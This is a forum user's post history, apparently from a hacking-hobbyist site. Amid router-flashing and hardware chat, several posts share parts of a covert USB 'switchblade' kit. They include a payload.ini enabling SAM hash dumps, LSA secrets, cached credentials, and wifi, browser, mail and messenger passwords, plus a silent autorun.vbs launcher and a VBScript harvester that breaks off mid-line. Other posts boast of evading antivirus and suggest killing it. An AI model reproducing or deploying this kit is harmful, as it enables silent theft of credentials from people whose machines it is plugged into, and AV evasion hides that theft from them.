Jump to content

beakmyn

Active Members
  • Posts

    422
  • Joined

  • Last visited

Everything posted by beakmyn

  1. Yes, You'll need to use Gargoyle and AP51 to get openwrt on it. It's still basically point and click for the technically challenged. Although the plus is a bit a PITA getting openwrt on it. It tooks me several tries. Whereas DD-WRT does it in one try. PM me and I'll send an invite which I believe gets you the Fon+ for $19.95
  2. I've got 17 invitations also. PM me with you're email and I'll send it out to you.
  3. Track 1 and Tarack 3 are typically propriatary to the manufacturer. I.e. it's not going to be the same for every card. Sometimes it's just a repeat of what's on track 2. You'll also find the not everybody uses the standard protocol such as hotel door cards.
  4. Since Gonzor's seems to be MIA I'll have to re-release my version and update any needed files first. I believe mine still "flys under the radar" on Antivirus engines since Mcafee, Norton and AVG have Gonzor's virus signature.
  5. If you want hardware level control $3.50USD http://www.allelectronics.com/make-a-store...READER/-/1.html You'll need to build an interface. But this will give you the raw data out. So it will give you the most control. I.E. if you're reading a non-standard card (hotel key cards). Not difficult if you know assembly ;) If you want to read standard cards (track 1,2,3/credit card, driver's license, etc) http://www.sparkfun.com/commerce/product_i...roducts_id=8633 Singular a company based in Taiwan used to send free samples out if you asked nicely. That's how I got my serial reader. You won't get a magstripe writer for less then about $140USD. It will only write the standard format and may only write tracks 1,2
  6. Try Grainger's or local electrical supply shop. Most towns that have any type of manufacturing have a local electrical supply shop that services them. Heck go down the industrial area of your town and ask the secretary at the front desk if she knows the names of the local shops. BTW, most elevator buttons are going to be rated to run at 240VAC not 110VAC
  7. There's some OTC remedies for Menopause, you might want to look into that.
  8. Last year Shmoocon set up a nice secure network for the Con. I forget the details but I believe it was a Radius system with certificates. A lot of people were saying it was one the best Con networks they'd used. There is wifi at the hotel but you have to pay for it and it isn't cheap or secure. Everyone knows that you don't fsck with the Con network and you're pretty safe on it. However the hotel's wifi well that gets treated differently. If you have to check you're company email then you'd better be tunneled through a VPN or at the bare minimum being using the https:// webmail interface. It's 3 days do your REALLY have to check it? If you're planning on blogging, chatting then use the Con network. If you're just surfing the web, hell pay to use the hotel network. Or do as we did and Pwn the kiosks :). I'll unlock them all this year! Me I have a VPN at home that I tunnel all my traffic through.
  9. If admin hasn't installed and you're not an admin then no truecrypt. http://www.truecrypt.org/docs/?s=administrator-privileges There is however Rohos, a freeware program that does not require admin rights. However it is closed source so there's no way to verify it's integrity. http://www.rohos.com/free-encryption/downloads/
  10. @jdogherman Yes, using vbscript I do it in my hacksaw @tcstool What are you looking for when you dump the registry? I would think you'd want the various autorun values as a start. Then go from there. The directory list also took a fair amount of space on my sytems also.
  11. Ok, so I decided to run the tool on my own pc. It took several minutes and I ended up with 200MB of information. Hmm, a bit large. I saw the issue with redistributing 3rd party tools one solution which I've been adapting is the here: http://episteme.arstechnica.com/eve/forums.../m/429006588831 It will download the tools on the fly when run. So, we could instruct folks to run the "setup" batch file before creating their iso Otherwise I can do all this with WMI and vbs scripting like I said before, but I know your trying to stay away from that since you don't want have to work around an overzealous sysadmin whose blocked vbs files, but the initial autorun is vbs ;) So, I can do formatting of the batch file output in batch but it's very painful. Although it's not as easy we could compile the .vbs to exe but from what I've found in the past some programs just wrap the vbs in a exe.
  12. There may be a new version of firepassword available. For the antivirus you'll need to research on methods of detecting AV and killing them or other methods available on this forum
  13. <edit> Ok, I'm back to DD-wrt v24 with working LAN/WAN and wifi. So, what's stopping me from implementing this in DD-wrt? I didn't see where that question got fully answered. I'm willing do to some grunt work with cross-compiling, etc but I'd like your input on the probability of getting this to work.
  14. I'll keep trying. I did find this: http://www.lefinnois.net/wpen/index.php/20...work-on-fonera/ It looks like he's got a workaround for ethernet. I'll try this way using tftpd rather then ap51 and see where that gets me.
  15. Ah poopy. It's not bricked yet! So I tried using Kamikaze 7.09 with ap-51 gui. I thought that'd be easy then the old method I used to get dd-wrt on it. I was wrong. It looked like everything went ok with loading the rootfs and kernel and the ap51 program said it reset the router but I got nothing. Well almost nothing. I've got a Redboot prompt so I've got a way out. I'm wondering if anybody's gotten here and then what they did? I'm thinking I'm going to need to do the following to get it up and going again. RedBoot&gt; fconfig -l -n boot_script: true boot_script_data: .. fis load -b 0x80100000 loader .. go 0x80100000 boot_script_timeout: 2 bootp: false bootp_my_gateway_ip: 0.0.0.0 bootp_my_ip: 192.168.1.1 bootp_my_ip_mask: 255.255.255.0 bootp_server_ip: 192.168.1.254 console_baud_rate: 9600 gdb_port: 9000 info_console_force: false net_debug: false RedBoot&gt; fconfig Run script at boot: true Boot script: .. fis load -b 0x80100000 loader .. go 0x80100000 Enter script, terminate with empty line &gt;&gt; fis load -l vmlinux.bin.l7 &gt;&gt; exec &gt;&gt; Boot script timeout (1000ms resolution): 10 Use BOOTP for network configuration: false Gateway IP address: Local IP address: 192.168.10.10 Local IP address mask: 255.255.255.0 Default server IP address: 192.168.10.1 Console baud rate: 9600 GDB connection port: 9000 Force console for special debug messages: false Network debug at boot time: false Update RedBoot non-volatile configuration - continue (y/n)?y What do you think?
  16. The payload ini file <flash drive>\system\src\payload.ini [Payload] ;Set Enables based on OS Version WIN98 = 1 WINME = 1 WIN2K = 1 XP = 1 VISTA = 1 WIN2003 = 1 UNKNOWN = 1 [U3] Enable = 1 [Variables] Timer=1721 [Log Path] ;Log path will be flash drive \ &lt;Dir&gt; \computername ;I'll put in the slashes at the beginning and end Dir = Documents [System Info] Enable = 1 [Users] ;Method 1 = low detail 2 =high detail (20 sec procces time) Method = 1 [External IP] Enable = 0 url = http://checkip.dyndns.org/ ;1 = XMLHTTP 2=wget (requires exe) Method = 1 [VNC] ;Not IMPLEMENTED Enable = 0 [Haksaw] ;Not IMPLEMENTED Enable = 0 emailfrom = emailto = password = subject = %computername%_ip client = yes taskbar = no [SMTP] accept = 127.0.0.1:1099 connect = smtp.gmail.com:465 [WIFI Key] Enable = 1 [SAM PWDUMP] Enable = 0 KeepFile = 1 [SAM FGDUMP] Enable = 1 KeepFile = 1 [Network Password] Enable = 1 [Mail Password] Enable = 1 [Firefox Password] Enable = 1 [IE Password] Enable = 1 [Messenger Password] Enable = 1 [Cache] Enable = 1 KeepFile = 0 ;1 = FGDump.exe 2=Cachedump.exe Method = 1 [LSA Secrets] Enable = 1 [Product Keys] Enable = 0 [IE URL History] Enable = 1 [Windows Updates List] Enable = 0 [Firewall Status] Enable = 0 [Open Port Scan] Enable = 0 [Clipboard] Enable = 1 [Win Audit] Enable = 0 cmdline = /r=oxutn /o=HTML /m=CA Security Scan [WPA] Enable = 0 [Nirtone] Enable = 1 Tone_1 = 2000 150 Tone_2 = 4000 150
  17. My "amish" version on the flash drive in case I can't access the CD-Rom for some reason <fd>\autorun.vbs Set objFSO = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("Wscript.Shell") Set colDrives = objFSO.Drives On Error Resume Next Dim aryVersion strComputerName = objShell.ExpandEnvironmentStrings("%computername%") 'strDate = Year(now()) &amp; Right("0" &amp; Month(now()), 2) &amp; Right("0" &amp; Day(now()), 2) 'strTime = Right("0" &amp; Hour(now()), 2) &amp; Right("0" &amp; Minute(now()), 2) &amp; Right("0" &amp; Second(now()), 2) For Each objDrive in colDrives 'ignore floppy drives - reserved by BIOS if they don't exist If UCase(objDrive.DriveLetter) &lt;&gt; "A" And UCase(objDrive.DriveLetter) &lt;&gt; "B" Then If objFSO.FileExists(objDrive.DriveLetter &amp; ":\System\SRC\payload.ini") Then strfd = objDrive.Driveletter &amp; ":" End If If objFSO.FileExists(objDrive.DriveLetter &amp; ":\System\SRC\payload.vbs") Then strU3 = objDrive.Driveletter &amp; ":" End If End if Next objShell.Run ".\fc\fc.exe", 0, False wscript.Quit 'In case machine doesn't have new Scripting Engine 5.0 or later we use the version without regular expressions Function MyTrim(mystring) Dim start,Endpos start=1 for i=1 to Len(mystring) if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then start=i+1 else exit for end if next Endpos=Len(mystring) for i=Len(mystring) to 1 step -1 if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then Endpos=i-1 else exit for end if next if (endpos-start+1)&lt;0 then MyTrim="" Exit Function end if MyTrim=Mid(mystring,start,Endpos-start+1) End Function Function ReadINI(section,key,filename) if objFSO.FileExists(filename) then Dim fReadINI, bsection bsection=False Set fReadINI = objFSO.OpenTextFile(filename,1) Do while not(fReadINI.AtEndOfStream) Dim strini,trimstrini strini = fReadINI.ReadLine trimstrini = MyTrim(strini) if Left(trimstrini,1)="[" and Right(Trimstrini,1)="]" then if StrComp(Trimstrini,"[" &amp; MyTrim(section) &amp; "]",1)=0 Then bsection=True else bsection =False end if Else if bsection then Dim poskey poskey = InStr(Trimstrini,"=") if posKey&gt;0 then if StrComp(MyTrim(Left(Trimstrini,poskey-1)),MyTrim(key),1)=0 Then ReadINI = MyTrim(Mid(Trimstrini,poskey+1)) Exit Function end If End if end if End if Loop End if ReadINI = "" End Function
  18. <CD>\System\src\payload.vbs On Error Resume Next Dim ArgObj, fd, U3, strComputerName, strLogPath, strIncludePath, strUserName Dim strDate, strTime, objTextFile Dim objNet, objFSO, oExec, objShell, objLeftFile, objRightFile, OS, Sleepms, isAdmin Set ArgObj = WScript.Arguments Set objNet = CreateObject("WScript.NetWork") Set objFSO = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("Wscript.Shell") Const FOR_READING = 1 Const FOR_APPENDING = 8 Const FOR_WRITING = 2 Const ssfHISTORY = 34 ' Create constants for access rights and registry hive const KEY_QUERY_VALUE = &amp;H0001 const KEY_SET_VALUE = &amp;H0002 const KEY_CREATE = &amp;H0032 const KEY_CREATE_SUB_KEY = &amp;H0004 const KEY_DELETE = &amp;H00010000 const HKEY_LOCAL_MACHINE = &amp;H80000002 'fd ="c:\" 'U3 = "c:\System\SRC" fd=ArgObj(0) &amp; "\" U3=ArgObj(1) &amp; "\System\SRC" strOS = ArgObj(2) Set ArgObj = Nothing strComputerName = objNet.ComputerName strUserName = objNet.UserName strDomain = objNet.UserDomain Set objNet = Nothing strDate = Year(now()) &amp; Right("0" &amp; Month(now()), 2) &amp; Right("0" &amp; Day(now()), 2) strTime = Right("0" &amp; Hour(now()), 2) &amp; Right("0" &amp; Minute(now()), 2) &amp; Right("0" &amp; Second(now()), 2) 'Month/Day/Year strFormDate = Right("0" &amp; Month(now()), 2) &amp; "\" &amp; Right("0" &amp; Day(now()), 2) &amp; "\" &amp; Year(now()) 'HH:MM:SS strFormTime = Right("0" &amp; Hour(now()), 2) &amp; ":" &amp; Right("0" &amp; Minute(now()), 2) &amp; ":" &amp; Right("0" &amp; Second(now()), 2) 'Change Directory objShell.CurrentDirectory = U3 strIniFile = fd &amp; "System\SRC\payload.ini" strLogPath = fd &amp; ReadINI("Log Path","Dir",strIniFile) &amp; "\" &amp; strComputerName strCurLog = strLogPath &amp; "\" &amp; strDate &amp; "-" &amp; strTime 'SET LOG PATHS If not objFSO.FolderExists(strLogPath) Then objFSO.CreateFolder strLogPath End If If Not objFSO.FolderExists(strCurLog) Then objFSO.CreateFolder strCurLog End if strhtmFile = strLogPath &amp; "\" &amp; strComputerName &amp; "-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" strlhtmFile = strCurLog &amp; "\left-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" strrhtmFile = strCurLog &amp; "\right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" strtmpFile = strLogPath &amp; "\" &amp; strComputerName &amp; ".tmp" strFireFile = strLogPath &amp; "\" &amp; strComputerName &amp; ".fire" winaud = ReadINI("Win Audit","cmdline",strIniFile) nirtone1 =ReadINI("Nirtone","Tone_1",strIniFile) nirtone2 =ReadINI("Nirtone","Tone_2",strIniFile) 'LEFT PANEL HTML - LIST Set objLeftFile = objFSO.CreateTextFile(strlhtmFile) objLeftFile.Close Set objLeftFile = objFSO.OpenTextFile(strlhtmFile,FOR_APPENDING) objLeftFile.WriteLine"&lt;!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.01 Transitional//EN""&gt; " objLeftFile.WriteLine"&lt;html&gt;&lt;head&gt;&lt;title&gt;" &amp; strComputerName &amp; "&lt;/title&gt; " objLeftFile.WriteLine"&lt;meta name=""generator"" content=""SwitchBlade""&gt;&lt;meta http-equiv=""Content-Type"" content=""text/html; charset=utf-8""&gt;&lt;style type=""text/css""&gt; " objLeftFile.WriteLine"&lt;!-- " objLeftFile.WriteLine"body, h1, h2, h3, h4, h5, h6, td, th, div, pre, code, span, p, ol, ul, dl, dt, dd, li, blockquote, center " objLeftFile.WriteLine"{ " objLeftFile.WriteLine"font-family: verdana, sans-serif, arial, helvetica; " objLeftFile.WriteLine"font-size: 11px; " objLeftFile.WriteLine"} " objLeftFile.WriteLine"a " objLeftFile.WriteLine"{ " objLeftFile.WriteLine"text-decoration: underline; " objLeftFile.WriteLine"} " objLeftFile.WriteLine"a:hover " objLeftFile.WriteLine"{ " objLeftFile.WriteLine"color: #ff9900; " objLeftFile.WriteLine"text-decoration: underline; " objLeftFile.WriteLine"} " objLeftFile.WriteLine"&lt;!-- Document Style --&gt; " objLeftFile.WriteLine"--&gt; " objLeftFile.WriteLine"&lt;/style&gt;&lt;/head&gt; " objLeftFile.WriteLine"&lt;body topmargin=""0"" leftmargin=""0"" style=""background-color: rgb(219, 217, 202);"" vlink=""#0000ff""&gt;&lt;table style=""width: 500px;"" border=""0""&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=""background-color: rgb(204, 102, 0);""&gt;&lt;b&gt;&lt;font color=""#ffffff""&gt;" &amp; strComputerName &amp; "&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt; " '::MAIN HTML - OPENS LEFT AND RIGHT PANELS" Set objTextFile = objFSO.CreateTextFile(strhtmFile) objTextFile.Close Set objTextFile = objFSO.OpenTextFile(strhtmFile,FOR_APPENDING) objTextFile.WriteLine"&lt;!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.01 Transitional//EN""&gt; " objTextFile.WriteLine"&lt;html&gt;&lt;head&gt; " objTextFile.WriteLine" " objTextFile.WriteLine"&lt;title&gt;Switchblade Audit " &amp; strComputerName &amp; "&lt;/title&gt;&lt;meta name=""generator"" content=""SwitchBlade""&gt; " objTextFile.WriteLine"&lt;meta name=""author"" content=""Hak.5""&gt; " objTextFile.WriteLine"&lt;meta http-equiv=""Content-Type"" content=""text/html; charset=utf-8""&gt; " objTextFile.WriteLine"&lt;style type=""text/css""&gt; " objTextFile.WriteLine"&lt;!-- " objTextFile.WriteLine"body, h1, h2, h3, h4, h5, h6, td, th, div, pre, code, span, p, ol, ul, dl, dt, dd, li, blockquote, center " objTextFile.WriteLine"{ " objTextFile.WriteLine" font-family: verdana, sans-serif, arial, helvetica; " objTextFile.WriteLine" font-size: 11px;} " objTextFile.WriteLine"a " objTextFile.WriteLine"{ " objTextFile.WriteLine" text-decoration: none; " objTextFile.WriteLine"} " objTextFile.WriteLine"a:hover " objTextFile.WriteLine"{ " objTextFile.WriteLine" color: #ff9900; " objTextFile.WriteLine" text-decoration: underline; " objTextFile.WriteLine"} " objTextFile.WriteLine"--&gt; " objTextFile.WriteLine"&lt;/style&gt;&lt;/head&gt; " objTextFile.WriteLine"" objTextFile.WriteLine"&lt;frameset cols=""20%, *""&gt;&lt;frame name=""left"" src=""" &amp; ".\" &amp; strDate &amp; "-" &amp; strTime &amp; "\left-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; """&gt;&lt;frame name=""right"" src=""" &amp; ".\" &amp; strDate &amp; "-" &amp; strTime &amp; "\right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; """&gt;&lt;/frameset&gt;&lt;/html&gt; " objTextFile.Close Set objTextFile = Nothing Set objRightFile = objFSO.CreateTextFile(strrhtmFile) objRightFile.Close Set objRightFile = objFSO.OpenTextFile(strrhtmFile,FOR_APPENDING) '::RIGHT PANEL HTML - The Good stuff objRightFile.WriteLine" &lt;!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.01 Transitional//EN""&gt;" objRightFile.WriteLine" &lt;html&gt;&lt;head&gt; " objRightFile.WriteLine" &lt;meta name=""generator"" content=""SwitchBlade""&gt;&lt;meta name=""author"" content=""Hak.5""&gt;&lt;meta http-equiv=""Content-Type"" content=""text/html; charset=utf-8""&gt;&lt;style type=""text/css""&gt; " objRightFile.WriteLine" &lt;!-- " objRightFile.WriteLine" body, h1, h2, h3, h4, h5, h6, td, th, div, pre, code, span, p, ol, ul, dl, dt, dd, li, blockquote, center " objRightFile.WriteLine" { " objRightFile.WriteLine" font-family: verdana, sans-serif, arial, helvetica; " objRightFile.WriteLine" font-size: 11px; " objRightFile.WriteLine" } " objRightFile.WriteLine" a " objRightFile.WriteLine" { " objRightFile.WriteLine" text-decoration: none; " objRightFile.WriteLine" } " objRightFile.WriteLine" a:hover " objRightFile.WriteLine" { " objRightFile.WriteLine" color: #ff9900; " objRightFile.WriteLine" text-decoration: underline; " objRightFile.WriteLine" } " objRightFile.WriteLine" table " objRightFile.WriteLine" { " objRightFile.WriteLine" border-color: #006699; " objRightFile.WriteLine" } " objRightFile.WriteLine" td " objRightFile.WriteLine" { " objRightFile.WriteLine" border-color: #006699; " objRightFile.WriteLine" } " objRightFile.WriteLine" td.colhead " objRightFile.WriteLine" { " objRightFile.WriteLine" background-color: #99ccff; " objRightFile.WriteLine" } " objRightFile.WriteLine" td.hilitebg " objRightFile.WriteLine" { " objRightFile.WriteLine" background-color: #f2f2f2; " objRightFile.WriteLine" } " objRightFile.WriteLine" --&gt; " objRightFile.WriteLine" &lt;/style&gt;&lt;/head&gt; " objRightFile.WriteLine" " objRightFile.WriteLine" &lt;body&gt;&lt;a name=""doc_top""&gt;&lt;/a&gt;&lt;table align=""right"" border=""0"" rules=""none""&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td align=""right""&gt;&lt;/td&gt; " objRightFile.WriteLine" &lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt; &lt;/p&gt; " objRightFile.WriteLine" &lt;center&gt;&lt;p&gt;&lt;font size=""4""&gt;&lt;b&gt;Computer Audit :: " &amp; strFormDate &amp; " " &amp; strFormTime &amp; "&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt; " '+----------------------------------+ '+ [Setup] + '+----------------------------------+ Sleepms = ReadINI("Variables","Timer",strIniFile) Set objReg=GetObject("winmgmts:"_ &amp; "{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") strKeyPath = "SYSTEM\CurrentControlSet" isAdmin = False ' Does the account under which the script runs have the ' right to query the SYSTEM\CurrentControlSet key objReg.CheckAccess HKEY_LOCAL_MACHINE, strKeyPath, _ DELETE, isAdmin ':: PAYLOAD If ReadINI("System Info","Enable",strIniFile) Then '+----------------------------------+ '+ [BIOS] + '+----------------------------------+ objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_0"" target=""right""&gt;BIOS Overview&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_0""&gt;&lt;/a&gt;&lt;font size=""5""&gt;&lt;b&gt;System Overview&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;font size=""3""&gt;&lt;b&gt;BIOS Overview&lt;/b&gt;&lt;/font&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Item&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Value&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime") Set objWMIService = GetObject("winmgmts:" _ &amp; "{impersonationLevel=impersonate}!\\.\root\cimv2") Set colBIOS = objWMIService.ExecQuery("Select * from Win32_BIOS") For Each objBIOS in colBIOS objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Build Number&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.BuildNumber &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Current Language&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.CurrentLanguage &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Manufacturer&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.Manufacturer &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Name&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; objBIOS.Name &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Primary BIOS&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.PrimaryBIOS &amp; "&lt;/td&gt;&lt;/tr&gt;" dtmConvertedDate.Value = objBIOS.ReleaseDate dtmReleaseDate = dtmConvertedDate.GetVarDate objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Release Date&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; dtmReleaseDate &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Serial Number&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.SerialNumber &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;SMBIOS Version&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.SMBIOSVersion &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;SMBIOS Major Version&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.SMBIOSMajorVersion &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;SMBIOS Minor Version&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.SMBIOSMinorVersion &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;SMBIOS Present?&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.SMBIOSPresent &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Status&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.Status &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Version&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.Version &amp; "&lt;/td&gt;&lt;/tr&gt;" &amp; _ "&lt;/td&gt;&lt;/tr&gt;" Next Set dtmConvertedDate = Nothing Set objWMIService = Nothing Set colBIOS = Nothing 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" '+----------------------------------+ '+ [System info] + '+----------------------------------+ objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_1"" target=""right""&gt;OS OverView&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_1""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;OS Overview&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Item&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Value&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime") Set objWMIService = GetObject("winmgmts:" _ &amp; "{impersonationLevel=impersonate}!\\.\root\cimv2") Set colOSes = objWMIService.ExecQuery("Select * from Win32_OperatingSystem") For Each objOS in colOSes objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Logged On User&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; strUserName &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Computer Name&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.CSName &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Domain&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; strDomain &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Caption&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.Caption &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Build Number&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; objOS.BuildNumber &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Build Type&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.BuildType &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Boot Device&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.BootDevice &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Country Code&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.CCountryCode &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Debug&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.Debug &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Encryption Level&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.EncryptionLevel &amp; "&lt;/td&gt;&lt;/tr&gt;" dtmConvertedDate.Value = objOS.InstallDate dtmInstallDate = dtmConvertedDate.GetVarDate objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Install Date&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; dtmInstallDate &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Licensed Users&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.NumberOfLicensedUsers &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Organization&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.Organization &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Language&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.Language &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;OS Type&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.OSType &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Primary OS&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.Primary &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Registered User&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.RegisteredUser &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Serial Number&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.SerialNumber &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Other Type Description&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.OtherTypeDescription &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine 